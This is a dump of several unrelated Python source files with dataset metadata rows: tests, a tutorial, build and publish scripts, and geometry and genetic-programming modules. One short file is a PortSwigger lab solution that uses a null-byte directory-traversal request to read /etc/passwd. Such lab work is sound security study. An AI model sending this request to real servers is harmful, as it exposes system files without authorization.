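    return accumulate(compose1, identity, n, lambda k: h)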
| 25.690821 | 92 | 0.548326 | 788 | 5,318 | 3.624365 | 0.178934 | 0.031863 | 0.046218 | 0.037815 | 0.382353 | 0.30042 | 0.248599 | 0.212185 | 0.212185 | 0.184874 | 0 | 0.057647 | 0.275856 | 5,318 | 206 | 93 | 25.815534 | 0.683978 | 0.587251 | 0 | 0.288136 | 0 | 0 | 0.150635 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.271186 | false | 0 | 0.016949 | 0.050847 | 0.559322 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
e409ad0c94dc67812d4ce4eb1f3a9b3b256b6a43
| 638 |
py
|
Python
|
acceptance/test/TestStartStopFeature.py
|
ismacaulay/qtcwatchdog
|
72f3588eef1019bac8788fa58c52722dfa7c4d28
|
[
"MIT"
] | null | null | null |
acceptance/test/TestStartStopFeature.py
|
ismacaulay/qtcwatchdog
|
72f3588eef1019bac8788fa58c52722dfa7c4d28
|
[
"MIT"
] | 12 |
2015-10-22T15:38:28.000Z
|
2016-03-22T18:53:57.000Z
|
acceptance/test/TestStartStopFeature.py
|
ismacaulay/qtcwatchdog
|
72f3588eef1019bac8788fa58c52722dfa7c4d28
|
[
"MIT"
] | null | null | null |
from acceptance.harness.acceptance_test import WatchdogAcceptanceTest


class TestStartStopFeature(WatchdogAcceptanceTest):

    def test_willStartObserverWhenWatchdogStarted(self):
        self.create_and_start_watchdog()
        self.assertTrue(self.fs_observer.running)

    def test_willStopObserverWhenWatchdogStopped(self):
        self.create_and_start_watchdog()
        self.watchdog.stop()
        self.assertFalse(self.fs_observer.running)

    def test_willJoinObserverThreadWhenWatchdogStopped(self):
        self.create_and_start_watchdog()
        self.watchdog.stop()
        self.assertTrue(self.fs_observer.joined)
| 26.583333 | 69 | 0.761755 | 61 | 638 | 7.704918 | 0.393443 | 0.044681 | 0.089362 | 0.108511 | 0.476596 | 0.404255 | 0.285106 | 0.212766 | 0.212766 | 0.212766 | 0 | 0 | 0.166144 | 638 | 23 | 70 | 27.73913 | 0.883459 | 0 | 0 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.230769 | 1 | 0.230769 | false | 0 | 0.076923 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
e409e1ff47556f0c395cedaf6538d4e9082df50c
| 1,243 |
py
|
Python
|
neural_spline_flows/nde/transforms/transform_test.py
|
VincentStimper/nsf
|
6bde505639ebcb67bffa227ea0021e3de235e03d
|
[
"MIT"
] | null | null | null |
neural_spline_flows/nde/transforms/transform_test.py
|
VincentStimper/nsf
|
6bde505639ebcb67bffa227ea0021e3de235e03d
|
[
"MIT"
] | null | null | null |
neural_spline_flows/nde/transforms/transform_test.py
|
VincentStimper/nsf
|
6bde505639ebcb67bffa227ea0021e3de235e03d
|
[
"MIT"
] | null | null | null |
import torch
import torchtestcase

from neural_spline_flows.nde.transforms import base


class TransformTest(torchtestcase.TorchTestCase):
    """Base test for all transforms."""

    def assert_tensor_is_good(self, tensor, shape=None):
        self.assertIsInstance(tensor, torch.Tensor)
        self.assertFalse(torch.isnan(tensor).any())
        self.assertFalse(torch.isinf(tensor).any())
        if shape is not None:
            self.assertEqual(tensor.shape, torch.Size(shape))

    def assert_forward_inverse_are_consistent(self, transform, inputs):
        inverse = base.InverseTransform(transform)
        identity = base.CompositeTransform([inverse, transform])
        outputs, logabsdet = identity(inputs)
        self.assert_tensor_is_good(outputs, shape=inputs.shape)
        self.assert_tensor_is_good(logabsdet, shape=inputs.shape[:1])
        self.assertEqual(outputs, inputs)
        self.assertEqual(logabsdet, torch.zeros(inputs.shape[:1]))

    def assertNotEqual(self, first, second, msg=None):
        if ((self._eps and (first - second).abs().max().item() < self._eps) or
                (not self._eps and torch.equal(first, second))):
            self._fail_with_message(msg, "The tensors are _not_ different!")
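
# A hedged usage sketch (our addition): a concrete test case would subclass
# TransformTest and exercise the helpers roughly as below. The transform
# construction is an assumption, not code from the nsf package.
# class ExampleTransformTest(TransformTest):
#     def test_forward_inverse(self):
#         transform = base.CompositeTransform([])  # assumed to act as identity
#         inputs = torch.randn(4, 3)
#         self.assert_forward_inverse_are_consistent(transform, inputs)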
| 37.666667 | 78 | 0.693484 | 149 | 1,243 | 5.630872 | 0.416107 | 0.042908 | 0.05006 | 0.064362 | 0.052443 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001992 | 0.192277 | 1,243 | 32 | 79 | 38.84375 | 0.833665 | 0.023331 | 0 | 0 | 0 | 0 | 0.026534 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.136364 | false | 0 | 0.136364 | 0 | 0.318182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
e40c283a7830ae526fea47bfe3f1719fdb809be3
| 358 |
py
|
Python
|
directory-traversal/validate-file-extension-null-byte-bypass.py
|
brandonaltermatt/penetration-testing-scripts
|
433b5d000a5573e60b9d8e49932cedce74937ebc
|
[
"MIT"
] | null | null | null |
directory-traversal/validate-file-extension-null-byte-bypass.py
|
brandonaltermatt/penetration-testing-scripts
|
433b5d000a5573e60b9d8e49932cedce74937ebc
|
[
"MIT"
] | null | null | null |
directory-traversal/validate-file-extension-null-byte-bypass.py
|
brandonaltermatt/penetration-testing-scripts
|
433b5d000a5573e60b9d8e49932cedce74937ebc
|
[
"MIT"
] | null | null | null |
"""
https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass
"""
import sys
import requests
site = sys.argv[1]
if 'https://' in site:
site = site.rstrip('/').lstrip('https://')
url = f'''https://{site}/image?filename=../../../etc/passwd%00.png'''
s = requests.Session()
resp = s.get(url)
print(resp.text)
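# Hypothetical invocation (our addition; the lab hostname is an example):
# python3 validate-file-extension-null-byte-bypass.py https://YOUR-LAB-ID.web-security-academy.net/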
| 21.058824 | 101 | 0.664804 | 52 | 358 | 4.576923 | 0.730769 | 0.067227 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009288 | 0.097765 | 358 | 17 | 102 | 21.058824 | 0.727554 | 0.282123 | 0 | 0 | 0 | 0 | 0.292 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.111111 | 0.222222 | 0 | 0.222222 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
7c0efca532f7042e0db58c5e7fb4f25f0274261b
| 3,437 |
py
|
Python
|
Assignment Day 2 .py
|
ShubhamKahlon57/Letsupgrade-python-Batch-7
|
7989c2d2f17e58dd4ee8f278c37d2c1d18e5e3af
|
[
"Apache-2.0"
] | null | null | null |
Assignment Day 2 .py
|
ShubhamKahlon57/Letsupgrade-python-Batch-7
|
7989c2d2f17e58dd4ee8f278c37d2c1d18e5e3af
|
[
"Apache-2.0"
] | null | null | null |
Assignment Day 2 .py
|
ShubhamKahlon57/Letsupgrade-python-Batch-7
|
7989c2d2f17e58dd4ee8f278c37d2c1d18e5e3af
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
# Lists and their functions
# In[6]:
# empty list
my_list = []
# list of integers
my_list = [1, 2, 3]
# list with mixed data types
my_list = [1, "Hello", 3.4]
# In[7]:
# nested list
my_list = ["mouse", [8, 4, 6], ['a']]
# In[11]:
# List indexing
my_list = ['p', 'r', 'o', 'b', 'e']
# Output: p
print(my_list[0])
# Output: o
print(my_list[2])
# Output: e
print(my_list[4])
# Nested List
n_list = ["Happy", [2, 0, 1, 5]]
# Nested indexing
print(n_list[0][1])
print(n_list[1][3])
# Error! Only an integer can be used for indexing;
# a non-integer index such as my_list[4.0] raises TypeError
# print(my_list[4.0])
# In[9]:
# Appending and Extending lists in Python
odd = [1, 3, 5]
odd.append(7)
print(odd)
odd.extend([9, 11, 13])
print(odd)
# In[13]:
# Deleting list items
my_list = ['p', 'r', 'o', 'b', 'l', 'e', 'm']
# delete one item
del my_list[2]
print(my_list)
# delete multiple items
del my_list[1:5]
print(my_list)
# delete entire list
del my_list
# In[14]:
# Appending and Extending lists in Python
odd = [1, 3, 5]
odd.append(7)
print(odd)
odd.extend([9, 11, 13])
print(odd)
# In[15]:
# Dictionaries and their functions
# In[18]:
my_dict = {}  # empty dictionary
# dictionary with integer keys
my_dict = {1: 'apple', 2: 'ball'}
# dictionary with mixed keys
my_dict = {'name': 'John', 1: [2, 4, 3]}
# using dict()
my_dict = dict({1:'apple', 2:'ball'})
# from sequence having each item as a pair
my_dict = dict([(1,'apple'), (2,'ball')])
# In[20]:
# get vs [] for retrieving elements
my_dict = {'name': 'Jack', 'age': 26}
# Output: Jack
print(my_dict['name'])
# Output: 26
print(my_dict.get('age'))
# In[21]:
# Changing and adding Dictionary Elements
my_dict = {'name': 'Jack', 'age': 26}
# update value
my_dict['age'] = 27
#Output: {'age': 27, 'name': 'Jack'}
print(my_dict)
# add item
my_dict['address'] = 'Downtown'
# Output: {'address': 'Downtown', 'age': 27, 'name': 'Jack'}
print(my_dict)
# In[22]:
# Sets and their functions
# In[23]:
my_set = {1, 2, 3}
print(my_set)
# In[24]:
my_set = {1.0, "Hello", (1, 2, 3)}
print(my_set)
# In[25]:
# set cannot have duplicates
my_set = {1, 2, 3, 4, 3, 2}
print(my_set)
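# Added illustration (not in the original notebook): the set operations the
# section heading promises - union, intersection and difference.
A = {1, 2, 3}
B = {3, 4, 5}
print(A | B)  # union: {1, 2, 3, 4, 5}
print(A & B)  # intersection: {3}
print(A - B)  # difference: {1, 2}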
# In[26]:
# Tuples and their methods
# In[27]:
# Tuple having integers
my_tuple = (1, 2, 3)
print(my_tuple)
# In[28]:
my_tuple = ("hello")
print(type(my_tuple))
# In[30]:
# Accessing tuple elements using indexing
my_tuple = ('p','e','r','m','i','t')
print(my_tuple[0])
print(my_tuple[5])
# In[31]:
print(my_tuple[-1])
# In[32]:
print(my_tuple[-6])
# In[36]:
# Changing tuple values
my_tuple = (4, 2, 3, [6, 5])
# TypeError: 'tuple' object does not support item assignment
# my_tuple[1] = 9
# However, item of mutable element can be changed
my_tuple[3][0] = 9 # Output: (4, 2, 3, [9, 5])
print(my_tuple)
# Tuples can be reassigned
my_tuple = ('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z')
# Output: ('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z')
print(my_tuple)
# In[37]:
# Strings and their functions
# In[38]:
# Python string examples - all assignments are identical.
String_var = 'Python'
String_var = "Python"
String_var = """Python"""
# with Triple quotes Strings can extend to multiple lines
String_var = """ This document will help you to
explore all the concepts
of Python Strings!!! """
# Replace "document" with "tutorial" and store in another variable
substr_var = String_var.replace("document", "tutorial")
print (substr_var)
# In[ ]:
| 12.059649 | 66 | 0.607507 | 573 | 3,437 | 3.541012 | 0.289703 | 0.069 | 0.0414 | 0.016264 | 0.22622 | 0.207491 | 0.175456 | 0.089699 | 0.089699 | 0.080828 | 0 | 0.05208 | 0.195519 | 3,437 | 284 | 67 | 12.102113 | 0.681736 | 0.441082 | 0 | 0.347826 | 0 | 0 | 0.134021 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.405797 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0
| 1 |
7c0f552f843493e2753dc5c4baf8ccf2206f5f32
| 195 |
py
|
Python
|
hackerrank/pickingNumbers.py
|
irvandindaprakoso/online-test-py
|
a7a6cd98ba3e0b74558ecb7e431eb2729077a38a
|
[
"W3C"
] | null | null | null |
hackerrank/pickingNumbers.py
|
irvandindaprakoso/online-test-py
|
a7a6cd98ba3e0b74558ecb7e431eb2729077a38a
|
[
"W3C"
] | null | null | null |
hackerrank/pickingNumbers.py
|
irvandindaprakoso/online-test-py
|
a7a6cd98ba3e0b74558ecb7e431eb2729077a38a
|
[
"W3C"
] | null | null | null |
def pickingNumbers(a):
    # Write your code here
    # For each value i, the largest valid subset containing i uses only the
    # values i and i-1, so its size is count(i) + count(i-1).
    best = 0  # renamed from `max` to avoid shadowing the built-in
    for i in a:
        c = a.count(i)
        d = a.count(i - 1)
        e = c + d
        if e > best:
            best = e
    return best
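# Hypothetical usage (our addition), in the style of the HackerRank samples:
# pickingNumbers([4, 6, 5, 3, 3, 1]) -> 3 (the multiset {3, 3, 4})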
| 17.727273 | 26 | 0.435897 | 32 | 195 | 2.65625 | 0.59375 | 0.141176 | 0.164706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019048 | 0.461538 | 195 | 10 | 27 | 19.5 | 0.790476 | 0.102564 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 0 | 1 | 0.111111 | false | 0 | 0 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c18032075b4197ee9055f4f541529df445b2854
| 998 |
py
|
Python
|
tests/cli/conftest.py
|
Aahbree/reference-data-repository
|
f318c0532aaf941ec4f00c8375c9dea45c56f186
|
[
"MIT"
] | null | null | null |
tests/cli/conftest.py
|
Aahbree/reference-data-repository
|
f318c0532aaf941ec4f00c8375c9dea45c56f186
|
[
"MIT"
] | 5 |
2021-01-27T22:17:19.000Z
|
2021-12-14T17:13:58.000Z
|
tests/cli/conftest.py
|
Aahbree/reference-data-repository
|
f318c0532aaf941ec4f00c8375c9dea45c56f186
|
[
"MIT"
] | 5 |
2021-12-08T02:33:44.000Z
|
2021-12-13T03:21:51.000Z
|
# This file is part of the Reference Data Repository (refdata).
#
# Copyright (C) 2021 New York University.
#
# refdata is free software; you can redistribute it and/or modify it under the
# terms of the MIT License; see LICENSE file for more details.

"""Fixtures for testing the command-line interface."""

import os
import pytest

from click.testing import CliRunner

from refdata.db import DB

import refdata.config as config


@pytest.fixture
def refdata_cli(tmpdir):
    """Initialize the environment and the database for the local store."""
    basedir = os.path.abspath(str(tmpdir))
    connect_url = 'sqlite:///{}'.format(os.path.join(basedir, 'test.db'))
    DB(connect_url=connect_url).init()
    os.environ[config.ENV_BASEDIR] = basedir
    os.environ[config.ENV_URL] = connect_url
    # Make sure to reset the database.
    yield CliRunner()
    # Clear environment variables that were set for the test runner.
    del os.environ[config.ENV_BASEDIR]
    del os.environ[config.ENV_URL]
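
# A minimal sketch (our addition, not shipped with the package) of a test that
# consumes the fixture above; the import path of the Click entry point `cli`
# is an assumption.
# def test_cli_help(refdata_cli):
#     from refdata.cli.base import cli
#     result = refdata_cli.invoke(cli, ['--help'])
#     assert result.exit_code == 0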
| 30.242424 | 78 | 0.733467 | 148 | 998 | 4.885135 | 0.547297 | 0.055325 | 0.082988 | 0.099585 | 0.135546 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004831 | 0.170341 | 998 | 32 | 79 | 31.1875 | 0.868357 | 0.450902 | 0 | 0 | 0 | 0 | 0.035849 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.333333 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
7c1a4912119b5eeaa02dc5d6942de0df8f969733
| 1,783 |
py
|
Python
|
python/jittor/utils/publish.py
|
Jittor/Jittor
|
bc945bae94bded917214b0afe12be6bf5b919dbe
|
[
"Apache-2.0"
] | 4 |
2020-01-12T13:16:16.000Z
|
2020-01-12T15:43:54.000Z
|
python/jittor/utils/publish.py
|
Jittor/Jittor
|
bc945bae94bded917214b0afe12be6bf5b919dbe
|
[
"Apache-2.0"
] | null | null | null |
python/jittor/utils/publish.py
|
Jittor/Jittor
|
bc945bae94bded917214b0afe12be6bf5b919dbe
|
[
"Apache-2.0"
] | 1 |
2020-01-12T13:17:17.000Z
|
2020-01-12T13:17:17.000Z
|
#!/usr/bin/python3
# ***************************************************************
# Copyright (c) 2022 Jittor. All Rights Reserved.
# Maintainers:
#     Dun Liang <randonlang@gmail.com>.
#
# This file is subject to the terms and conditions defined in
# file 'LICENSE.txt', which is part of this source code package.
# ***************************************************************

# Publish steps:
#   1. build, push, upload docker image [jittor/jittor]
#   2. build, push, upload docker image [jittor/jittor-cuda]
# upload to pip:
#   rm -rf dist && python3.7 ./setup.py sdist && python3.7 -m twine upload dist/*

import os


def run_cmd(cmd):
    print("[run cmd]", cmd)
    assert os.system(cmd) == 0


def upload_file(path):
    run_cmd(f"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/")


def docker_task(name, build_cmd):
    run_cmd(build_cmd)
    run_cmd(f"sudo docker push {name}")
    bname = os.path.basename(name)
    run_cmd(f"sudo docker save {name}:latest -o /tmp/{bname}.tgz && sudo chmod 666 /tmp/{bname}.tgz")
    upload_file(f"/tmp/{bname}.tgz")


docker_task(
    "jittor/jittor-cuda-11-1",
    "sudo docker build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . --network host"
)

docker_task(
    "jittor/jittor",
    "sudo docker build --tag jittor/jittor:latest . --network host"
)

docker_task(
    "jittor/jittor-cuda",
    "sudo docker build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host"
)

docker_task(
    "jittor/jittor-cuda-10-1",
    "sudo docker build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . --network host"
)

run_cmd("ssh jittor-web Documents/jittor-blog.git/hooks/post-update")
| 34.288462 | 144 | 0.647224 | 258 | 1,783 | 4.403101 | 0.403101 | 0.105634 | 0.098592 | 0.077465 | 0.498239 | 0.387324 | 0.285211 | 0.123239 | 0 | 0 | 0 | 0.029373 | 0.140774 | 1,783 | 52 | 145 | 34.288462 | 0.712141 | 0.326416 | 0 | 0.137931 | 0 | 0.137931 | 0.643098 | 0.296296 | 0 | 0 | 0 | 0 | 0.034483 | 1 | 0.103448 | false | 0 | 0.034483 | 0 | 0.137931 | 0.034483 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c1dfdf1304b0b11fe75fef3682da8277a3d5207
| 2,981 |
py
|
Python
|
racer/methods/genetic_programming/parameterized.py
|
max-eth/racer
|
952991aedec5d8229bb1126c9c066613f5c30146
|
[
"MIT"
] | 1 |
2022-02-26T00:10:03.000Z
|
2022-02-26T00:10:03.000Z
|
racer/methods/genetic_programming/parameterized.py
|
max-eth/racer
|
952991aedec5d8229bb1126c9c066613f5c30146
|
[
"MIT"
] | null | null | null |
racer/methods/genetic_programming/parameterized.py
|
max-eth/racer
|
952991aedec5d8229bb1126c9c066613f5c30146
|
[
"MIT"
] | null | null | null |
import copy

import numpy as np

from racer.utils import load_pickle
from racer.methods.genetic_programming.program_tree import ProgramTree


class ParameterizedTree(ProgramTree):
    # This makes the assumption that all children of the underlying tree are
    # in a field .children and that the underlying tree has the field .name

    def __init__(self, underlying_tree, init_fct=None, _copy=True):
        if _copy:
            underlying_tree = copy.deepcopy(underlying_tree)  # safety first

        if hasattr(underlying_tree, "children"):
            underlying_tree.children = [
                ParameterizedTree(underlying_tree=child, _copy=False)
                for child in underlying_tree.children
            ]

        self.underlying_tree = underlying_tree

        if init_fct is None:
            self.set_params([1, 0])
        else:
            self.set_params(init_fct())

    def set_params(self, params):
        self.weight, self.bias = params
        self.name = self.underlying_tree.name + " * {} + {}".format(
            self.weight, self.bias
        )

    def get_params(self):
        return [self.weight, self.bias]

    def __call__(self, *x):
        return self.underlying_tree(*x) * self.weight + self.bias

    def __len__(self):
        return len(self.underlying_tree)

    def display(self, prefix):
        res = prefix + self.name + "\n"
        if hasattr(self.underlying_tree, "children"):
            for child in self.underlying_tree.children:
                res += child.display(prefix=" " + prefix)
        return res

    def _set_dirty(self):
        raise Exception("Parameterized trees should not be mutated")

    def in_order(self):
        yield self
        if hasattr(self.underlying_tree, "children"):
            for child in self.underlying_tree.children:
                for node in child.in_order():
                    yield node


class ParameterizedIndividual:
    def __init__(self, parameterized_trees):
        self.parameterized_trees = parameterized_trees

    @staticmethod
    def from_individual(ind):
        return ParameterizedIndividual(
            parameterized_trees=[ParameterizedTree(tree) for tree in ind.trees]
        )

    @staticmethod
    def from_pickled_individual(fname):
        return ParameterizedIndividual.from_individual(load_pickle(fname))

    def __call__(self, *x):
        return [tree(*x) for tree in self.parameterized_trees]

    def __len__(self):
        return sum(len(tree) for tree in self.parameterized_trees)

    def set_flat_parameters(self, params):
        n_used = 0
        for tree in self.parameterized_trees:
            for node in tree.in_order():
                node.set_params(list(params[n_used:n_used + 2]))
                n_used += 2

    def get_flat_parameters(self):
        params = []
        for tree in self.parameterized_trees:
            for node in tree.in_order():
                params += node.get_params()
        return np.array(params)
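
# A small round-trip sketch (our addition; `ind` is assumed to be an existing
# genetic-programming individual with a `.trees` attribute):
# pind = ParameterizedIndividual.from_individual(ind)
# flat = pind.get_flat_parameters()   # [w1, b1, w2, b2, ...], two per node
# pind.set_flat_parameters(flat)      # a round trip leaves behaviour unchanged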
| 32.402174 | 146 | 0.637035 | 356 | 2,981 | 5.103933 | 0.255618 | 0.13869 | 0.089158 | 0.039626 | 0.226197 | 0.171712 | 0.171712 | 0.134287 | 0.134287 | 0.134287 | 0 | 0.002325 | 0.27843 | 2,981 | 91 | 147 | 32.758242 | 0.842399 | 0.051325 | 0 | 0.2 | 0 | 0 | 0.027965 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.057143 | 0.1 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c28fc0563fc8f73fd257c1d3e24a953c2e9ec7c
| 1,780 |
py
|
Python
|
src/compas/datastructures/mesh/bbox.py
|
arpastrana/compas
|
ed677a162c14dbe562c82d72f370279259faf7da
|
[
"MIT"
] | 2 |
2021-03-17T18:14:22.000Z
|
2021-09-19T13:50:02.000Z
|
src/compas/datastructures/mesh/bbox.py
|
arpastrana/compas
|
ed677a162c14dbe562c82d72f370279259faf7da
|
[
"MIT"
] | 9 |
2019-09-11T08:53:19.000Z
|
2019-09-16T08:35:39.000Z
|
src/compas/datastructures/mesh/bbox.py
|
Licini/compas
|
34f65adb3d0abc3f403312ffba62aa76f3376292
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

from compas.geometry import bounding_box
from compas.geometry import bounding_box_xy


__all__ = [
    'mesh_bounding_box',
    'mesh_bounding_box_xy',
]


def mesh_bounding_box(mesh):
    """Compute the (axis aligned) bounding box of a mesh.

    Parameters
    ----------
    mesh : compas.datastructures.Mesh
        The mesh data structure.

    Returns
    -------
    list of point
        The 8 corners of the bounding box of the mesh.

    Examples
    --------
    >>> mesh_bounding_box(mesh)
    [[0.0, 0.0, 0.0], [10.0, 0.0, 0.0], [10.0, 10.0, 0.0], [0.0, 10.0, 0.0], [0.0, 0.0, 0.0], [10.0, 0.0, 0.0], [10.0, 10.0, 0.0], [0.0, 10.0, 0.0]]

    """
    xyz = mesh.vertices_attributes('xyz', keys=list(mesh.vertices()))
    return bounding_box(xyz)


def mesh_bounding_box_xy(mesh):
    """Compute the (axis aligned) bounding box of a projection of the mesh in the XY plane.

    Parameters
    ----------
    mesh : compas.datastructures.Mesh
        The mesh data structure.

    Returns
    -------
    list of point
        The 4 corners of the bounding polygon in the XY plane.

    Examples
    --------
    >>> mesh_bounding_box_xy(mesh)
    [[0.0, 0.0, 0.0], [10.0, 0.0, 0.0], [10.0, 10.0, 0.0], [0.0, 10.0, 0.0]]

    """
    xyz = mesh.vertices_attributes('xyz')
    return bounding_box_xy(xyz)


# ==============================================================================
# Main
# ==============================================================================

if __name__ == '__main__':

    import doctest
    import compas
    from compas.datastructures import Mesh

    mesh = Mesh.from_obj(compas.get('faces.obj'))

    doctest.testmod()
| 23.733333 | 148 | 0.561236 | 247 | 1,780 | 3.842105 | 0.206478 | 0.096944 | 0.110643 | 0.101159 | 0.514226 | 0.478398 | 0.404636 | 0.404636 | 0.404636 | 0.322445 | 0 | 0.061297 | 0.211798 | 1,780 | 74 | 149 | 24.054054 | 0.61511 | 0.538202 | 0 | 0 | 0 | 0 | 0.085592 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.380952 | 0 | 0.571429 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
7c3522929deb4bb2524b97c1af2b5f08df9a050e
| 5,585 |
py
|
Python
|
backend/0_publish_audio.py
|
bmj-hackathon/ethberlinzwei-babelfish_3_0
|
e986ad1b9fa896f20d7cdd296d130d804f55ecfa
|
[
"Apache-2.0"
] | 1 |
2019-08-28T12:12:09.000Z
|
2019-08-28T12:12:09.000Z
|
backend/0_publish_audio.py
|
bmj-hackathon/ethberlinzwei-babelfish_3_0
|
e986ad1b9fa896f20d7cdd296d130d804f55ecfa
|
[
"Apache-2.0"
] | 8 |
2020-09-07T01:00:44.000Z
|
2022-03-02T05:19:32.000Z
|
backend/0_publish_audio.py
|
bmj-hackathon/ethberlinzwei-babelfish_3_0
|
e986ad1b9fa896f20d7cdd296d130d804f55ecfa
|
[
"Apache-2.0"
] | 3 |
2019-08-24T20:36:08.000Z
|
2021-02-18T20:28:11.000Z
|
import sys
import logging
# loggers_dict = logging.Logger.manager.loggerDict
#
# logger = logging.getLogger()
# logger.handlers = []
#
# # Set level
# logger.setLevel(logging.DEBUG)
#
# # FORMAT = "%(asctime)s - %(levelno)s - %(module)-15s - %(funcName)-15s - %(message)s"
# # FORMAT = "%(asctime)s %(levelno)s: %(module)30s %(message)s"
# FORMAT = "%(levelno)s - %(module)-15s - %(funcName)-15s - %(message)s"
#
# DATE_FMT = "%Y-%m-%d %H:%M:%S"
# DATE_FMT = "%Y-%m-%d %H:%M:%S"
# formatter = logging.Formatter(FORMAT, DATE_FMT)
#
# # Create handler and assign
# handler = logging.StreamHandler(sys.stderr)
# handler.setFormatter(formatter)
# logger.handlers = [handler]
# logger.debug("Logging started")
#%%
# Standard imports
import os
from pathlib import Path
import json
from time import sleep
# Ocean imports
import squid_py
from squid_py.ocean.ocean import Ocean
from squid_py.config import Config
from pprint import pprint
import mantaray_utilities as manta_utils
from mantaray_utilities.user import password_map
#%% CONFIG
OCEAN_CONFIG_PATH = Path().cwd() / 'config_nile.ini'
assert OCEAN_CONFIG_PATH.exists(), "{} - path does not exist".format(OCEAN_CONFIG_PATH)
os.environ['OCEAN_CONFIG_PATH'] = str(OCEAN_CONFIG_PATH)
PASSWORD_PATH=Path().cwd() / ".nile_passwords"
assert PASSWORD_PATH.exists()
os.environ["PASSWORD_PATH"] = str(PASSWORD_PATH)
MARKET_PLACE_PROVIDER_ADDRESS="0x376817c638d2a04f475a73af37f7b51a2862d567"
os.environ["MARKET_PLACE_PROVIDER_ADDRESS"] = MARKET_PLACE_PROVIDER_ADDRESS
JSON_TEMPLATE = Path().cwd() / 'metadata_template.json'
assert JSON_TEMPLATE.exists()
#%% ARGPARSE
import argparse
parser = argparse.ArgumentParser(description='Publish audio')
parser.add_argument('--url', type=str, help='URL for input audio file')
parser.add_argument('--price', type=int, help='Selling price in Ocean token')
